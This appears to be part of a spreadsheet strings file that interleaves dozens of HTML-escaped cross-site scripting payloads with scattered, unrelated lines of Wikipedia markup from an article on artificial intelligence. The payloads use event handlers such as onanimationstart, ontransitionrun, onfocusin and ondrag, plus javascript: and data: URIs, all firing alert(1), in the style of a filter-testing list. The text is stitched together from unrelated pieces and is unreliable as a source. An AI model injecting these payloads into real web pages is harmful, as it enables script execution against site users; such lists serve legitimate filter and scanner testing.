    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;dl id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;hr id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/hr&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;hr style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/hr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;div class="portal" role="navigation" id="p-coll-print_export"  aria-labelledby="p-coll-print_export-label"&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;listing style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/listing&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Evolutionary_programming" title="Evolutionary programming"&gt;Evolutionary programming &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;datalist ondblclick="alert(1)"&gt;test&lt;/datalist&gt;</t>
  </si>
  <si>
    <t>&lt;bdo onmousedown="alert(1)"&gt;test&lt;/bdo&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">    &lt;script type="text/javascript" src="_static/js/theme.js"&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;dt draggable="true" ondrag="alert(1)"&gt;test&lt;/dt&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.atitle=This+is+what+will+happen+when+robots+take+over+the+world&amp;amp;rft.date=2015-11-15&amp;amp;rft.aulast=Chan&amp;amp;rft.aufirst=Szu+Ping&amp;amp;rft_id=https%3A%2F%2Fwww.telegraph.co.uk%2Ffinance%2Feconomics%2F11994694%2FHeres-what-will-happen-when-robots-take-over-the-world.html&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;output id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/output&gt;</t>
  </si>
  <si>
    <t>&lt;form onclick="alert(1)"&gt;test&lt;/form&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" ondrag="alert(1)"&gt;test&lt;/div&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFDomingos2015"&gt;Domingos 2015 &lt;/a&gt;, chapter 6. </t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Category:Philosophy_of_science" title="Category:Philosophy of science"&gt;Category &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;content onkeyup="alert(1)" contenteditable&gt;test&lt;/content&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;var style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/var&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;em ondragover=alert(1) contenteditable&gt;drop here&lt;/em&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Open_Letter_on_Artificial_Intelligence" title="Open Letter on Artificial Intelligence"&gt;Open Letter on Artificial Intelligence &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;title onmouseover="alert(1)"&gt;test&lt;/title&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;ul ondragover=alert(1) contenteditable&gt;drop here&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;area onbeforecopy="alert(1)" contenteditable&gt;test&lt;/area&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;bdi ondrop=alert(1) contenteditable&gt;drop here&lt;/bdi&gt;</t>
  </si>
  <si>
    <t>&lt;h1 onbeforecut="alert(1)" contenteditable&gt;test&lt;/h1&gt;</t>
  </si>
  <si>
    <t>&lt;option onkeypress="alert(1)" contenteditable&gt;test&lt;/option&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFKismet" class="citation web"&gt;&lt;a rel="nofollow" class="external text" href="http://www.ai.mit.edu/projects/humanoid-robotics-group/kismet/kismet.html"&gt;"Kismet" &lt;/a&gt;. MIT Artificial Intelligence Laboratory, Humanoid Robotics Group&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;25 October </t>
  </si>
  <si>
    <t>&lt;p&gt;Settling on a bad, overly complex theory gerrymandered to fit all the past training data is known as &lt;a href="/wiki/Overfitting" title="Overfitting"&gt;overfitting &lt;/a&gt;. Many systems attempt to reduce overfitting by rewarding a theory in accordance with how well it fits the data, but penalizing the theory in accordance with how complex the theory is.&lt;sup id="cite_ref-FOOTNOTEDomingos2015Chapter_6,_Chapter_7_73-0" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTEDomingos2015Chapter_6,_Chapter_7-73"&gt;&amp;#91;71&amp;#93; &lt;/a&gt; &lt;/sup&gt; Besides classic overfitting, learners can also disappoint by "learning the wrong lesson". A toy example is that an image classifier trained only on pictures of brown horses and black cats might conclude that all brown patches are likely to be horses.&lt;sup id="cite_ref-FOOTNOTEDomingos2015286_74-0" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTEDomingos2015286-74"&gt;&amp;#91;72&amp;#93; &lt;/a&gt; &lt;/sup&gt; A real-world example is that, unlike humans, current image classifiers don't determine the spatial relationship between components of the picture; instead, they learn abstract patterns of pixels that humans are oblivious to, but that linearly correlate with images of certain types of real objects. Faintly superimposing such a pattern on a legitimate image results in an "adversarial" image that the system misclassifies.&lt;sup id="cite_ref-75" class="reference"&gt;&lt;a href="#cite_note-75"&gt;&amp;#91;c&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-76" class="reference"&gt;&lt;a href="#cite_note-76"&gt;&amp;#91;73&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-77" class="reference"&gt;&lt;a href="#cite_note-77"&gt;&amp;#91;74&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-78" class="reference"&gt;&lt;a href="#cite_note-78"&gt;&amp;#91;75&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC="javascript:alert('');"&gt;</t>
  </si>
  <si>
    <t>&lt;form draggable="true" ondragleave="alert(1)"&gt;test&lt;/form&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h2&gt;&lt;span class="mw-headline" id="Further_reading"&gt;Further reading </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;article id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/article&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;var style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/var&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;/a&gt; &lt;/i&gt;&amp;#93; &lt;/sup&gt;. Furthermore, AI in the markets limits the consequences of behavior in the markets again making markets more efficient&lt;sup class="noprint Inline-Template Template-Fact" style="white-space:nowrap;"&gt;&amp;#91;&lt;i&gt;&lt;a href="/wiki/Wikipedia:Citation_needed" title="Wikipedia:Citation needed"&gt;&lt;span title="This claim needs references to reliable sources. (July 2019)"&gt;citation needed </t>
  </si>
  <si>
    <t>&lt;rp id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/rp&gt;</t>
  </si>
  <si>
    <t>&lt;legend onkeydown="alert(1)" contenteditable&gt;test&lt;/legend&gt;</t>
  </si>
  <si>
    <t>&lt;menu id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/menu&gt;</t>
  </si>
  <si>
    <t>&lt;dd onmousemove="alert(1)"&gt;test&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;span onpointerover=alert(1)&gt;XSS&lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFLugerStubblefield2004"&gt;Luger &amp;amp; Stubblefield 2004 &lt;/a&gt;, pp.&amp;#160;458–467 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFLakoffNúñez2000"&gt;Lakoff &amp;amp; Núñez (2000) &lt;/a&gt; have controversially argued that even our skills at mathematics depend on knowledge and skills that come from "the body", i.e. sensorimotor and perceptual skills. (See &lt;a href="/wiki/Where_Mathematics_Comes_From" title="Where Mathematics Comes From"&gt;Where Mathematics Comes From &lt;/a&gt;) &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;div id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;em onpointermove=alert(1)&gt;XSS&lt;/em&gt;</t>
  </si>
  <si>
    <t>&lt;param onpointerover=alert(1)&gt;XSS&lt;/param&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;menu id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/menu&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;frame id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/frame&gt;</t>
  </si>
  <si>
    <t>&lt;tbody id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/tbody&gt;</t>
  </si>
  <si>
    <t>&lt;template onpointerenter=alert(1)&gt;XSS&lt;/template&gt;</t>
  </si>
  <si>
    <t>&lt;isindex onmousemove="alert(1)"&gt;test&lt;/isindex&gt;</t>
  </si>
  <si>
    <t>&lt;svg onpointerout=alert(1)&gt;XSS&lt;/svg&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;rb id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/rb&gt;</t>
  </si>
  <si>
    <t>&lt;animate onpointerenter=alert(1)&gt;XSS&lt;/animate&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;form id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/form&gt;</t>
  </si>
  <si>
    <t>&lt;embed oncontextmenu="alert(1)"&gt;test&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;ruby onpointerup=alert(1)&gt;XSS&lt;/ruby&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;animatetransform onbegin=alert(1) attributeName=transform&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;bgsound id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Glossary_of_evolutionary_biology" title="Glossary of evolutionary biology"&gt;Evolutionary biology &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFDomingos2015"&gt;Domingos 2015 &lt;/a&gt;, p.&amp;#160;88. </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h4&gt;&lt;span class="mw-headline" id="Computational_intelligence_and_soft_computing"&gt;Computational intelligence and soft computing </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;time ondrop=alert(1) contenteditable&gt;drop here&lt;/time&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=The+Economist&amp;amp;rft.atitle=From+not+working+to+neural+networking&amp;amp;rft.date=2016&amp;amp;rft_id=https%3A%2F%2Fwww.economist.com%2Fnews%2Fspecial-report%2F21700756-artificial-intelligence-boom-based-old-idea-modern-twist-not&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;address id=x tabindex=1 onfocus=alert(1)&gt;&lt;/address&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Supervised_learning" title="Supervised learning"&gt;Supervised learning &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;nextid id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/nextid&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;multicol onmousemove="alert(1)"&gt;test&lt;/multicol&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-72"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-72"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;base id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/base&gt;</t>
  </si>
  <si>
    <t>&lt;tr onblur=alert(1) tabindex=1 id=x&gt;&lt;/tr&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;img alt="Category" src="//upload.wikimedia.org/wikipedia/en/thumb/4/48/Folder_Hexagonal_Icon.svg/16px-Folder_Hexagonal_Icon.svg.png" decoding="async" title="Category" width="16" height="14" srcset="//upload.wikimedia.org/wikipedia/en/thumb/4/48/Folder_Hexagonal_Icon.svg/24px-Folder_Hexagonal_Icon.svg.png 1.5x, //upload.wikimedia.org/wikipedia/en/thumb/4/48/Folder_Hexagonal_Icon.svg/32px-Folder_Hexagonal_Icon.svg.png 2x" data-file-width="36" data-file-height="31" /&gt; &lt;b&gt;&lt;a href="/wiki/Category:Computer_science" title="Category:Computer science"&gt;Category &lt;/a&gt; &lt;/b&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;menu onpointerup=alert(1)&gt;XSS&lt;/menu&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-377"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-377"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;label draggable="true" ondrag="alert(1)"&gt;test&lt;/label&gt;</t>
  </si>
  <si>
    <t>&lt;output onkeypress="alert(1)" contenteditable&gt;test&lt;/output&gt;</t>
  </si>
  <si>
    <t>&lt;thead onpointerdown=alert(1)&gt;XSS&lt;/thead&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;listing id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/listing&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">			&lt;ul&gt;&lt;li id="n-help"&gt;&lt;a href="/wiki/Help:Contents" title="Guidance on how to use and edit Wikipedia"&gt;Help &lt;/a&gt; &lt;/li&gt;&lt;li id="n-aboutsite"&gt;&lt;a href="/wiki/Wikipedia:About" title="Find out about Wikipedia"&gt;About Wikipedia &lt;/a&gt; &lt;/li&gt;&lt;li id="n-portal"&gt;&lt;a href="/wiki/Wikipedia:Community_portal" title="About the project, what you can do, where to find things"&gt;Community portal &lt;/a&gt; &lt;/li&gt;&lt;li id="n-recentchanges"&gt;&lt;a href="/wiki/Special:RecentChanges" title="A list of recent changes in the wiki [r]" accesskey="r"&gt;Recent changes &lt;/a&gt; &lt;/li&gt;&lt;li id="n-contactpage"&gt;&lt;a href="//en.wikipedia.org/wiki/Wikipedia:Contact_us" title="How to contact Wikipedia"&gt;Contact page &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;template onload=alert(1)&gt;&lt;/template&gt;</t>
  </si>
  <si>
    <t>&lt;figcaption onpaste="alert(1)" contenteditable&gt;test&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/DeepMind" title="DeepMind"&gt;DeepMind &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;BR SIZE="&amp;{alert('')}"&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFNewquist1994"&gt;Newquist 1994 &lt;/a&gt;, pp.&amp;#160;189–201 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Magnetoresistive_random-access_memory" title="Magnetoresistive random-access memory"&gt;MRAM &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;table id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;isindex onbeforecut="alert(1)" contenteditable&gt;test&lt;/isindex&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;small id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/small&gt;</t>
  </si>
  <si>
    <t>&lt;cite onmousemove="alert(1)"&gt;test&lt;/cite&gt;</t>
  </si>
  <si>
    <t>&lt;nextid onpointerout=alert(1)&gt;XSS&lt;/nextid&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;Naive Bayes is reportedly the "most widely used learner" at Google, due in part to its scalability.&lt;sup id="cite_ref-FOOTNOTEDomingos2015152_227-0" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTEDomingos2015152-227"&gt;&amp;#91;219&amp;#93; &lt;/a&gt; &lt;/sup&gt; </t>
  </si>
  <si>
    <t>&lt;meter onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/meter&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;menuitem oncut="alert(1)" contenteditable&gt;test&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;plaintext id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t>&lt;h1 onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/h1&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;noembed style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/noembed&gt;</t>
  </si>
  <si>
    <t>&lt;header onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/header&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;Myers, Courtney Boyd ed. (2009). &lt;a rel="nofollow" class="external text" href="https://www.forbes.com/2009/06/22/singularity-robots-computers-opinions-contributors-artificial-intelligence-09_land.html"&gt;"The AI Report" &lt;/a&gt;. &lt;i&gt;Forbes &lt;/i&gt; June 2009 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;em onmouseleave="alert(1)"&gt;test&lt;/em&gt;</t>
  </si>
  <si>
    <t>&lt;html id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;acronym draggable="true" ondragstart="alert(1)"&gt;test&lt;/acronym&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;progress id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/progress&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FOOTNOTE&amp;#39;&amp;#39;CNN&amp;#39;&amp;#39;2006-291"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-FOOTNOTE&amp;#39;&amp;#39;CNN&amp;#39;&amp;#39;2006_291-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;image id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/image&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;xss style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/xss&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">    &lt;input type="hidden" name="area" value="default" /&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;label style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/label&gt;</t>
  </si>
  <si>
    <t>&lt;del ondblclick="alert(1)"&gt;test&lt;/del&gt;</t>
  </si>
  <si>
    <t>&lt;style draggable="true" ondragenter="alert(1)"&gt;test&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;meter onpointerenter=alert(1)&gt;XSS&lt;/meter&gt;</t>
  </si>
  <si>
    <t>&lt;br onmousemove="alert(1)"&gt;test&lt;/br&gt;</t>
  </si>
  <si>
    <t>&lt;div class="shortdescription nomobile noexcerpt noprint searchaux" style="display:none"&gt;Intelligence demonstrated by machines &lt;/div&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Embodied_AI-167"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Embodied_AI_167-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;multicol id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/multicol&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;noframes ondrop=alert(1) contenteditable&gt;drop here&lt;/noframes&gt;</t>
  </si>
  <si>
    <t>&lt;hr onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/hr&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Nano-RAM" title="Nano-RAM"&gt;NRAM &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;Johnston, John (2008) &lt;i&gt;The Allure of Machinic Life: Cybernetics, Artificial Life, and the New AI &lt;/i&gt;, MIT Press. &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;dt onkeyup="alert(1)" contenteditable&gt;test&lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;optgroup onclick="alert(1)"&gt;test&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t>&lt;body onbeforepaste="alert(1)" contenteditable&gt;test&lt;/body&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Tabula_rasa" title="Tabula rasa"&gt;Tabula rasa &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Digital_library" title="Digital library"&gt;Digital library &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;label oncontextmenu="alert(1)"&gt;test&lt;/label&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;Ian Goodfellow, Yoshua Bengio, and Aaron Courville (2016). Deep Learning. MIT Press. &lt;a rel="nofollow" class="external text" href="http://www.deeplearningbook.org"&gt;Online &lt;/a&gt; &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20160416111010/http://www.deeplearningbook.org/"&gt;Archived &lt;/a&gt; 16 April 2016 at the &lt;a href="/wiki/Wayback_Machine" title="Wayback Machine"&gt;Wayback Machine &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;bdo onmousemove="alert(1)"&gt;test&lt;/bdo&gt;</t>
  </si>
  <si>
    <t>&lt;map onpointerover=alert(1)&gt;XSS&lt;/map&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;colgroup id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/w/index.php?title=Grey_Wolf_Optimizer&amp;amp;action=edit&amp;amp;redlink=1" class="new" title="Grey Wolf Optimizer (page does not exist)"&gt;Grey Wolf Optimizer &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="/wiki/Sepp_Hochreiter" title="Sepp Hochreiter"&gt;Sepp Hochreiter &lt;/a&gt; (1991), &lt;a rel="nofollow" class="external text" href="http://people.idsia.ch/~juergen/SeppHochreiter1991ThesisAdvisorSchmidhuber.pdf"&gt;Untersuchungen zu dynamischen neuronalen Netzen &lt;/a&gt; &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20150306075401/http://people.idsia.ch/~juergen/SeppHochreiter1991ThesisAdvisorSchmidhuber.pdf"&gt;Archived &lt;/a&gt; 6 March 2015 at the &lt;a href="/wiki/Wayback_Machine" title="Wayback Machine"&gt;Wayback Machine &lt;/a&gt;, Diploma thesis. Institut f. Informatik, Technische Univ. Munich. Advisor: J. Schmidhuber. </t>
  </si>
  <si>
    <t>&lt;bdo onmouseenter="alert(1)"&gt;test&lt;/bdo&gt;</t>
  </si>
  <si>
    <t>&lt;dl onpaste="alert(1)" contenteditable&gt;test&lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;iframe/src="data:text/html,&lt;svg onload=alert(1)&gt;"&gt;</t>
  </si>
  <si>
    <t>&lt;area id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/area&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">			Navigation</t>
  </si>
  <si>
    <t>&lt;acronym onpointerout=alert(1)&gt;XSS&lt;/acronym&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, p.&amp;#160;18. </t>
  </si>
  <si>
    <t>&lt;article id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/article&gt;</t>
  </si>
  <si>
    <t>&lt;html onpointerleave=alert(1)&gt;XSS&lt;/html&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h4&gt;&lt;span class="mw-headline" id="Strong_AI_hypothesis"&gt;Strong AI hypothesis </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Neumann, Bernd; Möller, Ralf (January 2008). "On scene interpretation with description logics". &lt;i&gt;Image and Vision Computing &lt;/i&gt;. &lt;b&gt;26 &lt;/b&gt; (1): 82–101. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1016%2Fj.imavis.2007.08.013"&gt;10.1016/j.imavis.2007.08.013 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Image+and+Vision+Computing&amp;amp;rft.atitle=On+scene+interpretation+with+description+logics&amp;amp;rft.volume=26&amp;amp;rft.issue=1&amp;amp;rft.pages=82-101&amp;amp;rft.date=2008-01&amp;amp;rft_id=info%3Adoi%2F10.1016%2Fj.imavis.2007.08.013&amp;amp;rft.aulast=Neumann&amp;amp;rft.aufirst=Bernd&amp;amp;rft.au=M%C3%B6ller%2C+Ralf&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;th id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/th&gt;</t>
  </si>
  <si>
